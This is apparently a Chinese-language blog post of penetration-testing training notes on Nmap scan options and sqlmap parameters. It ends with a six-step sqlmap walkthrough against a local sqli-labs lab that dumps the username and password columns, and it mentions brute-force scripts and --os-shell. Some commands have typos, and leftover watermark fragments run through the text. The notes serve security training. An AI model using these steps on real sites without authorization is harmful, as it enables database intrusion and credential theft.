网络渗透实训笔记

                    Burp    Suite

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

 watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

                              Nampwatermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16                

Nmap + ip 6+ ip

Nmap -A 开启操作系统识别和版本识别功能

– T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现

-v 显示信息的级别,-vv显示更详细的信息

192.168.1.1/24 扫描C段 192.168.11 -254 =上

 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中)

 --------------- 192.168.1.1/24 --exclude

192.168.1.100 (排除在外的目标 .100)

 --------------- -----------------excludefile ~/targets.txt

 nmap 192.168.1.1 -p 80.443 网站 是否在这个端口部署网站

 nmap –traceroute 192.168.1.1 探测路由

 nmap -O 192.168.1.1 对目标进行指纹识别

 nmap -sV ---------- 对版本进行探测

 nmap -sF -T4 192.168.1.1 利用fin包对端口进行扫描,识别是否被关闭,收到RST包,说明被关闭。否则是open 后者 fileter状态。 (利用三次握手,可以绕开防火墙)

 nmap –script=auth+ip 处理鉴权证书的脚本,也可以作为检测部分应用弱口令

 -----------=brute+ip 暴力破解watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

 

                         Sqlmap

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

2.sqlmap 常用命令参数

-u /--url 最基本格式 sqlmap -u “XXXXXXXXXXXXX/index.pho?id=1”

-m 从文本中获取多个目标扫描,但是每一个一个url. sqlmap -m urllist.txt

-r 从文件中加载HTTP请求,这样的话就不需要再去设定cookie,POST数据….

--dbs 返回当前连接的数据库

--current-db 返回当前网站数据库的数据库用户

-D 指定数据库系统的数据库名

--tables 列举数据库表

-T 指定数据库表名

--columns 列举数据库表中的字段

-C 指定数据库表中的字段名

--dump 获取整个表的数据

设置回显等级

参数: -v默认为1

0 只显示python错误以及严重的信息

1 基本信息和警告信息

2 debug信息

3 注入的payload

(级别越高显示信息越多)

--data 把数以post方式提交,sqlmap会像检测GET参数一样检测POST过去的参数。

--cookie (用于区分用户)

可能会有漏洞,当web登录时,抓取数据包。

设定探测等级

--level

共有五个等级 默认为1 sqlmap使用的payload可以在xml/payloads.xml中看到

--users 列数据库管理用户

--current-user 在数据库中,目前连接的用户

--is-dba 判断当前是否为管理,是的话返回true

--proxy 指定一个代理服务器 eg: -proxy http://xxxxxx.8080

--os-shell 前提:需要网站的物理路径,其次是需要有FIILE权限

Sqlmap“六步”

第一步:判断是否注是注入点

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1”

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

 

第二步:获取数据库

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1” –dbswatermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

 

第三步:查看当前应用程序所用数据库

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1” --current-dbwatermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

四:列出指定数据库的所有表

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1” -D”security”—tableswatermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

五:读取指定表中的字段名称

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1” -D”security”-T users –colunmswatermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBfNjU0NTYyOTU=,size_20,color_FFFFFF,t_70,g_se,x_16

六:读取指定字段内容

sqlmap.py -u “http://localhost/sqlilabs/Less-1/?id=1” -D”security”-T users -C username,password –dump

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值